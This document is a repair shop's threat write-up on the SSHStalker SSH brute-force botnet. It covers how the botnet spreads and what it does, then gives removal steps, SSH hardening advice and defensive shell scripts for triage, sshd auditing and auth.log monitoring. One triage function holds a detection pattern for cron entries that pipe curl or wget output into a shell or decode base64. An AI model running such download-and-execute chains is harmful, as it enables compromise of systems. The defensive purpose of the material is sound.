The SSHStalker botnet represents a sophisticated distributed attack infrastructure that targets Linux servers and IoT devices through brute-force SSH credential attacks. Once it compromises a system, this malware transforms your machine into a node in a command-and-control network used for further attacks, cryptocurrency mining, DDoS operations, and data exfiltration. While primarily a threat to servers rather than home desktops, SSHStalker increasingly targets consumer NAS devices, routers with SSH enabled, and even Linux-based media centers, making it relevant to anyone running SSH services on their network.
Threat Profile
| Attribute | Details |
|---|---|
| Threat Family | SSH-based botnet malware / Linux remote access trojan |
| Primary Targets | Linux servers, IoT devices, NAS systems, routers with SSH enabled |
| Known Aliases | SSH.Stalker, SSHStalkerBot, variants tracked by various AV vendors under generic SSH trojan signatures |
| First Observed | Activity documented since early 2010s, with continuous evolution and variant development |
| Distribution Method | Brute-force SSH attacks against exposed port 22, credential stuffing, exploitation of default/weak passwords |
| Persistence Mechanisms | Cron jobs, systemd services, init.d scripts, modified SSH authorized_keys files, rootkit components |
| Primary Capabilities | Remote command execution, cryptocurrency mining, DDoS participation, credential harvesting, lateral network movement, proxy services |
| Network Behavior | Maintains persistent C2 connections, conducts outbound SSH scanning on port 22, downloads additional payloads, establishes reverse shells |
| Common Artifacts | Modified bash history, suspicious cron entries, unauthorized SSH keys, hidden processes, unusual CPU/network usage patterns |
| Detection Difficulty | Moderate to high — employs rootkit techniques and process hiding, but generates detectable network traffic patterns |
| Removal Complexity | High — requires thorough forensic analysis, complete system rebuild often recommended for production environments |
| Data Theft Risk | High — can access all files readable by compromised account, typically targets credentials, SSH keys, and configuration files |
How It Spreads
SSHStalker operates as a worm, meaning infected systems automatically seek out new victims to compromise. The botnet maintains extensive lists of IP addresses to target, systematically attempting SSH authentication using dictionaries of common usernames and passwords. When your SSH service is exposed to the internet on the default port 22, it faces thousands of automated login attempts daily from infected machines worldwide. Most administrators never notice these attempts until one succeeds.
The infection process typically exploits human factors rather than software vulnerabilities. System administrators who use default credentials, employ weak passwords, or fail to implement key-based authentication create the opening SSHStalker needs. Once the malware gains access with valid credentials, it operates with the full privileges of that user account. If that account has sudo rights or root access, the malware achieves complete system control immediately.
Common infection vectors include:
- Default credentials on consumer devices — NAS units, routers, and IoT devices shipped with factory default SSH passwords that users never change
- Weak password policies — Short passwords, dictionary words, or predictable patterns ("Password123", "admin2024") that fall to brute-force within hours
- Exposed SSH services — Enabling SSH remote access without firewall restrictions, port changes, or fail2ban protection
- Credential stuffing — Using credentials leaked from other breaches to attempt access across thousands of systems
- Insider threats — Compromised employee credentials or contractor access that wasn't properly revoked
- Lateral movement — Once on your network, SSHStalker scans for other SSH-enabled devices using harvested credentials or SSH keys found on the initial victim
- Supply chain compromise — Rare cases where devices arrive pre-infected from manufacturing facilities or compromised update servers
What It Does On Your Machine
Upon successful authentication, SSHStalker immediately begins establishing persistence and concealing its presence. The malware typically downloads additional components from command-and-control servers, installs itself in multiple locations across the filesystem, and modifies system configurations to survive reboots. On systems where it gains root access, it often deploys rootkit components that hide its processes from standard monitoring tools like ps and top, making detection significantly more challenging even for experienced administrators.
The botnet transforms your machine into a multifunctional attack platform. Infected systems typically run cryptocurrency mining software that consumes 60-90% of available CPU resources, dramatically slowing legitimate operations and increasing power consumption and heat output. Your device participates in distributed denial-of-service attacks against other targets, flooding them with traffic using your internet connection and potentially making you legally liable. The malware scans your local network for additional SSH-enabled devices, attempting to spread using any credentials or SSH keys it finds in your system.
Data theft represents one of SSHStalker's most damaging capabilities. The malware systematically harvests credentials from configuration files, bash history, SSH keys (both public and private), database connection strings, API tokens, and any other authentication materials it finds. These credentials get uploaded to the botnet's controllers and often sold on underground markets or used for targeted corporate espionage. If your infected device contains business data, customer information, or intellectual property, assume that data has been compromised.
System performance degradation usually becomes noticeable within hours of infection. Legitimate users experience sluggish response times, timeout errors, and unexplained reboots as the mining software maxes out resources. Your internet bandwidth gets consumed by scanning activity and DDoS traffic, potentially triggering complaints from your ISP or causing violations of your service agreement. On business networks, the lateral scanning generates security alerts that demand investigation, and the credential theft may enable attackers to access cloud services, email accounts, and other critical infrastructure tied to the compromised keys.
Manual Removal — Step by Step
Isolate the Compromised System Immediately
Disconnect the infected device from your network by unplugging the Ethernet cable or disabling Wi-Fi. Do not simply shut down the system — you need it running to collect forensic information. If this is a server hosting critical services, weigh the risk of keeping it online against the damage the botnet is causing. Document the current time and your actions for incident response records.
Document Current State and Network Connections
Before making any changes, capture evidence. Run netstat -anp or ss -anp to document active connections and their associated processes. Use ps auxf to get a process tree. Check crontab -l (for your user) and crontab -l -u root plus files in /etc/cron.d/. Review ~/.ssh/authorized_keys and /root/.ssh/authorized_keys for unauthorized entries. Screenshot or copy this information to external media for reference.
Identify and Kill Malicious Processes
Use top or htop to identify processes consuming unusual CPU resources. Note the process IDs and names. Check their parent processes and binary locations with ls -la /proc/[PID]/exe. Kill suspicious processes with kill -9 [PID], but understand this is temporary — the malware will likely restart via its persistence mechanisms. The goal here is to reduce immediate damage while you work on complete removal.
Remove Persistence Mechanisms
Check and clean all cron jobs system-wide: /etc/crontab, /etc/cron.d/*, /var/spool/cron/*. On systemd-based systems, review systemctl list-unit-files for suspicious services and examine files in /etc/systemd/system/ and /lib/systemd/system/. Remove any unauthorized entries. On older systems, check /etc/init.d/ and /etc/rc*.d/ directories. Remove unauthorized SSH keys from all authorized_keys files throughout the system.
Locate and Delete Malware Binaries
Delete the executable files you identified in the process investigation. Common hiding spots include /tmp/, /var/tmp/, /dev/shm/, hidden directories in /usr/local/, and dotfile directories in user homes. Use find / -name ".*" -type d 2>/dev/null to locate hidden directories. The malware often uses names mimicking legitimate system processes. Remove entire suspicious directory trees, not just individual files, as additional components may be present.
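The four steps above (documenting state, checking process binaries, auditing cron and authorized_keys, and locating hiding spots) can be scripted so that the evidence is captured consistently and can be copied to external media. The helpers below are an added example written for this article, not the article's own script and not code from the malware; every check takes the file or path to examine as an argument, so it can be pointed at a mounted disk image or a copied evidence directory as easily as at the live system. The allowlist file path, the script name and the sample key and cron entries used in the comments are all made up for illustration.

```shell
#!/bin/sh
# Added triage helpers for the removal steps (not the article's script and not
# malware code). Run as root on the live box so every /proc/<pid>/exe link is
# readable; each function also works on copied evidence.

# Classify a resolved /proc/<pid>/exe target. Returns 0 (suspicious) for a
# binary in a world-writable scratch directory, one deleted after launch (so it
# now runs from memory only), or one under a dotfile directory. A hidden-dir
# hit still needs a human look: ~/.local/bin is a legitimate home for tools.
suspicious_exe_path() {
    case "$1" in
        /tmp/*|/var/tmp/*|/dev/shm/*) return 0 ;;
        *" (deleted)")                return 0 ;;
        */.*/*)                       return 0 ;;
    esac
    return 1
}

# Print "pid exe-target" for every running process whose binary is suspicious.
scan_running_processes() {
    for exe in /proc/[0-9]*/exe; do
        target=$(readlink "$exe" 2>/dev/null) || continue
        if suspicious_exe_path "$target"; then
            pid=${exe#/proc/}; pid=${pid%/exe}
            printf '%s %s\n' "$pid" "$target"
        fi
    done
}

# Print every authorized_keys entry whose key blob is absent from an allowlist
# of known-good public keys ($2, one key per line). Entries may carry options
# such as command="..." before the key type, so the blob is the field after the
# first ssh-*/ecdsa-*/sk-* token rather than a fixed column.
audit_authorized_keys() {
    keyfile=$1; allowlist=$2
    while IFS= read -r line || [ -n "$line" ]; do
        case "$line" in ''|'#'*) continue ;; esac
        blob=$(printf '%s\n' "$line" | awk '{
            for (i = 1; i <= NF; i++)
                if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print $(i+1); exit }
        }')
        [ -n "$blob" ] || continue
        if ! grep -qF -- "$blob" "$allowlist"; then
            printf 'UNKNOWN KEY in %s: %s\n' "$keyfile" "$line"
        fi
    done < "$keyfile"
}

# Print cron lines (prefixed file:line) that reference scratch directories,
# download-and-pipe-to-shell chains, or base64 decoding: the persistence
# patterns described above. Missing files are skipped silently.
audit_cron_files() {
    for f in "$@"; do
        [ -f "$f" ] || continue
        grep -nE '(/tmp|/var/tmp|/dev/shm)/|(curl|wget)[^|]*[|][[:space:]]*(ba)?sh|base64[[:space:]]+(-d|--decode)' "$f" \
            | sed "s|^|$f:|" || true
    done
}

# Live run (hypothetical script name):
#   ./triage.sh --live /path/to/known_good_keys > /media/usb/triage.txt
if [ "${1:-}" = "--live" ]; then
    [ -n "${2:-}" ] || { echo "usage: $0 --live KNOWN_GOOD_KEYS_FILE" >&2; exit 2; }
    echo "== processes running from suspicious locations =="
    scan_running_processes
    echo "== suspicious cron entries =="
    audit_cron_files /etc/crontab /etc/cron.d/* /var/spool/cron/* /var/spool/cron/crontabs/*
    echo "== authorized_keys entries not in $2 =="
    for ak in /root/.ssh/authorized_keys /home/*/.ssh/authorized_keys; do
        if [ -f "$ak" ]; then audit_authorized_keys "$ak" "$2"; fi
    done
fi
```

The allowlist is the one input you must prepare yourself: collect the public keys you know should be on the machine from a trusted source (your own workstation, a password manager, a configuration repository), never from the compromised host. A key that the script flags is not proof of compromise on its own, but every flagged key has to be explained before the system goes back online.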
Check for Rootkit Components
Run rootkit detection tools like rkhunter and chkrootkit to identify kernel-level compromises. SSHStalker variants sometimes install rootkits that modify system binaries or kernel modules. If these tools report compromises, the system may be too deeply infected to clean reliably. Check the integrity of critical system binaries by comparing file hashes against known-good versions from your distribution's repository.
Scan with Multiple Security Tools
Install and run Linux-compatible malware scanners like ClamAV, Malwarebytes for Linux (if available for your distribution), or ESET NOD32 Antivirus for Linux. Run full system scans and quarantine or delete any detected threats. Be aware that these tools may not catch everything, especially newer variants or custom implementations, but they provide an additional detection layer beyond manual investigation.
Change All Credentials and Rotate Keys
Change passwords for every user account on the system, especially root and any accounts with sudo privileges. Generate completely new SSH key pairs and revoke all old keys — assume the attackers have copies of any private keys that were on the system. Update passwords for any services, databases, or APIs that were configured on this machine. If this device had access to cloud services or remote systems, change those credentials as well and review access logs for unauthorized activity.
Harden SSH Configuration Before Reconnecting
Before bringing the system back online, secure SSH properly. Disable password authentication in /etc/ssh/sshd_config (set PasswordAuthentication no). Use key-based authentication only. Change the SSH port from 22 to something non-standard. Implement fail2ban to block repeated authentication attempts. Restrict SSH access to specific IP addresses using firewall rules. Consider using a VPN for all remote access instead of exposing SSH directly to the internet.
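The settings listed above can be checked and applied mechanically. The script below is an added example written for this article, not the article's own code and not an OpenSSH tool: it reads an sshd_config (or the output of sshd -T) and reports the weak settings, then writes the hardened values as a drop-in. It assumes OpenSSH 8.2 or newer, whose stock sshd_config includes /etc/ssh/sshd_config.d/*.conf near the top so drop-in values take precedence; the drop-in file name, the port 2222 and the group name sshusers are placeholders to adapt.

```shell
#!/bin/sh
# Added example (not the article's code): audit an sshd_config for the weak
# settings the article names, and write the hardened values as a drop-in.
# Assumes OpenSSH 8.2+, where the default sshd_config includes
# /etc/ssh/sshd_config.d/*.conf before its own directives. On older releases
# append the same lines to the top of /etc/ssh/sshd_config instead.

# Effective value of one directive in a file, honouring two sshd rules: the
# first occurrence wins, and anything after a Match line is conditional (and
# ignored here). Falls back to $3, the OpenSSH default, when absent. Works on
# `sshd -T` output too, which is lower-cased and lists every effective value.
sshd_directive() {
    file=$1; name=$2; default=$3
    val=$(awk -v n="$name" '
        tolower($1) == "match"     { exit }
        tolower($1) == tolower(n)  { print $2; exit }
    ' "$file")
    printf '%s\n' "${val:-$default}"
}

# One line per finding; empty output means the file passes every check.
audit_sshd_config() {
    f=$1
    [ "$(sshd_directive "$f" PasswordAuthentication yes)" = no ] \
        || echo "PasswordAuthentication is on: password brute-force can succeed"
    case "$(sshd_directive "$f" PermitRootLogin prohibit-password)" in
        yes) echo "PermitRootLogin yes: root is the account every scanner tries first" ;;
    esac
    [ "$(sshd_directive "$f" PermitEmptyPasswords no)" = no ] \
        || echo "PermitEmptyPasswords yes: accounts with blank passwords can log in"
    [ "$(sshd_directive "$f" Port 22)" != 22 ] \
        || echo "Port 22: the default port draws the bulk of automated scanning"
    [ "$(sshd_directive "$f" MaxAuthTries 6)" -le 3 ] \
        || echo "MaxAuthTries above 3: each connection gets extra guesses"
    grep -qiE '^[[:space:]]*(AllowUsers|AllowGroups)[[:space:]]' "$f" \
        || echo "No AllowUsers/AllowGroups: every local account may log in over SSH"
}

# Hardened settings, written as a drop-in. SSH_PORT and ADMIN_GROUP are
# placeholders: pick a port above 1024 and create the group (and add your
# admin account to it) before enabling the file.
write_hardened_dropin() {
    cat > "$1" <<EOF
Port ${SSH_PORT:-2222}
PasswordAuthentication no
KbdInteractiveAuthentication no
PubkeyAuthentication yes
PermitRootLogin no
PermitEmptyPasswords no
MaxAuthTries 3
LoginGraceTime 30
AllowGroups ${ADMIN_GROUP:-sshusers}
EOF
}

# Live usage: audit the effective configuration, since sshd -T resolves
# Include files and defaults for you, then validate the drop-in with sshd -t.
#   tmp=$(mktemp) && sshd -T > "$tmp" && audit_sshd_config "$tmp"; rm -f "$tmp"
#   write_hardened_dropin /etc/ssh/sshd_config.d/10-hardening.conf && sshd -t
```

Keep your existing SSH session open while you restart sshd, and confirm that a fresh key-based login works on the new port before closing it; a typo in the drop-in otherwise locks you out of a machine you have just isolated. Firewall rules restricting the new port to your management addresses, as the prevention list recommends, belong in the same change window.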
Consider Complete Reinstallation
For critical systems or when rootkit compromise is suspected, manual cleaning is insufficient. Back up essential data (but not binaries or scripts), wipe the system completely, and reinstall from trusted installation media. Restore only validated data files, never configuration files or executables from the compromised system. This nuclear option is the only way to guarantee complete removal when dealing with sophisticated malware that may have modified system binaries or the kernel itself.
Prevention
- Disable password authentication entirely and use SSH key pairs exclusively. Generate strong keys (4096-bit RSA or Ed25519) and protect private keys with passphrases. This single change eliminates the brute-force attack vector SSHStalker depends on.
- Change SSH from port 22 to a non-standard port above 1024. This is obscurity rather than genuine security, but it dramatically reduces automated scanning traffic hitting your system and makes log files more manageable for identifying genuine threats.
- Implement fail2ban or similar intrusion prevention to automatically block IP addresses after a small number of failed authentication attempts. Configure it to ban for increasingly long periods on repeated offenses from the same source.
- Restrict SSH access using firewall rules to specific IP addresses or ranges. If you don't need SSH access from anywhere on the internet, don't expose it. Use a VPN for remote access and keep SSH bound to local network interfaces only.
- Keep systems updated with security patches applied promptly. While SSHStalker primarily exploits weak credentials, staying current prevents attackers from pivoting to privilege escalation exploits if they do gain limited access.
- Monitor system logs actively for authentication failures, successful logins from unexpected locations, or unusual patterns. Set up automated alerts for suspicious activity rather than waiting for performance problems to reveal an infection.
- Use network segmentation to isolate SSH-enabled devices from your primary network where possible. IoT devices, NAS systems, and other embedded Linux devices should run on separate VLANs with restricted access to sensitive resources.
- Audit and minimize the number of devices running SSH services. Consumer routers, media players, and smart home devices often enable SSH by default — disable it if you don't actively use it, and change default credentials immediately if you do.
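The monitoring and fail2ban items above can be made concrete with a small script. The following is an added example written for this article, not the article's code and not part of fail2ban or OpenSSH: it extracts two signals from a syslog-style auth.log, the sources generating repeated failures and, more importantly, any successful login from a source that had just been failing, and it writes a fail2ban jail for the escalating bans the list recommends. The log lines are constructed samples (TEST-NET addresses, invented host and process IDs), not real data; on a Debian/Ubuntu host point the functions at /var/log/auth.log, and on journald-only systems at a file produced with journalctl -u ssh -o short. The bantime.increment option requires fail2ban 0.11 or newer.

```shell
#!/bin/sh
# Added example (not the article's code): pull the two signals the article
# says to watch for out of a syslog-style auth.log, and write the fail2ban
# jail that automates the ban. Sample log lines are constructed, not real.

# Constructed sample: a source that fails five times and then gets in, a
# source that gives up after two tries, and an ordinary key-based login.
write_sample_log() {
    cat > "$1" <<'EOF'
Jan 10 03:14:01 nas sshd[2201]: Failed password for root from 198.51.100.7 port 51230 ssh2
Jan 10 03:14:03 nas sshd[2203]: Failed password for invalid user admin from 198.51.100.7 port 51231 ssh2
Jan 10 03:14:05 nas sshd[2205]: Failed password for root from 198.51.100.7 port 51232 ssh2
Jan 10 03:14:07 nas sshd[2207]: Failed password for root from 198.51.100.7 port 51233 ssh2
Jan 10 03:14:09 nas sshd[2209]: Failed password for root from 198.51.100.7 port 51234 ssh2
Jan 10 03:14:11 nas sshd[2211]: Accepted password for root from 198.51.100.7 port 51235 ssh2
Jan 10 03:20:00 nas sshd[2250]: Failed password for pi from 203.0.113.9 port 40001 ssh2
Jan 10 03:20:02 nas sshd[2252]: Failed password for pi from 203.0.113.9 port 40002 ssh2
Jan 10 08:00:00 nas sshd[3100]: Accepted publickey for alice from 192.0.2.10 port 50000 ssh2: ED25519 SHA256:constructedfingerprint
EOF
}

# "count ip" for every source with at least $2 failed password attempts
# (default 5), highest count first: the brute-force volume view.
failed_sources() {
    awk -v min="${2:-5}" '
        /: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") fails[$(i+1)]++
        }
        END { for (ip in fails) if (fails[ip] >= min) print fails[ip], ip }
    ' "$1" | sort -rn
}

# "user ip" for each Accepted login whose source had failed earlier in the
# same log: the signature of a brute-force that finally succeeded, which is
# the event that turns a noisy log into an incident.
success_after_failures() {
    awk '
        /: Failed password for / {
            for (i = 1; i <= NF; i++) if ($i == "from") seen[$(i+1)] = 1
        }
        /: Accepted (password|publickey) for / {
            for (i = 1; i <= NF; i++) {
                if ($i == "for")  user = $(i+1)
                if ($i == "from") ip = $(i+1)
            }
            if (ip in seen) print user, ip
        }
    ' "$1"
}

# fail2ban jail drop-in for escalating bans (bantime.increment needs
# fail2ban 0.11 or newer). Set port to your sshd port if you moved it.
write_fail2ban_jail() {
    cat > "$1" <<'EOF'
[sshd]
enabled = true
port = ssh
maxretry = 3
findtime = 10m
bantime = 1h
bantime.increment = true
bantime.maxtime = 1w
EOF
}

# Demo on the constructed sample (hypothetical script name): ./sshwatch.sh --demo
if [ "${1:-}" = "--demo" ]; then
    log=$(mktemp)
    write_sample_log "$log"
    echo "== sources over the failure threshold =="
    failed_sources "$log" 5
    echo "== successful logins from sources that had been failing =="
    success_after_failures "$log"
    rm -f "$log"
fi
```

Run failed_sources from cron to see who is hammering the service, but alert on success_after_failures: on a correctly hardened host with password authentication disabled, the Failed password lines disappear altogether and any Accepted password line is itself a finding. Write the jail to /etc/fail2ban/jail.d/ and reload fail2ban; keep the auth.log check running anyway, since fail2ban bans after the fact and a single success before the ban is exactly the event you need to know about.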
Bring It In
SSHStalker infections require expertise beyond typical malware removal because they involve Linux systems, network security, and credential management — areas where mistakes can compromise your entire infrastructure. Our technicians at Computer Repair Roswell have extensive experience with server security, IoT device hardening, and forensic analysis of compromised systems. We'll not only remove the infection but also identify how the attackers got in, what data they may have accessed, and implement proper security measures to prevent recurrence. For business customers, we provide detailed incident reports suitable for compliance documentation and insurance claims.
Located at 1255 Hembree Rd, Roswell, GA 30076, we handle Linux systems, NAS devices, network appliances, and any other SSH-capable equipment you bring in. Call us at (770) 954-1947 to discuss your situation. If you're dealing with a compromised server or suspect lateral movement across your network, we can provide emergency assessment and containment advice over the phone while you arrange to bring the equipment in. Don't let a botnet infection compromise your network, steal your data, or make you liable for attacks on others — bring it to the experts who understand both the malware and the platforms it targets.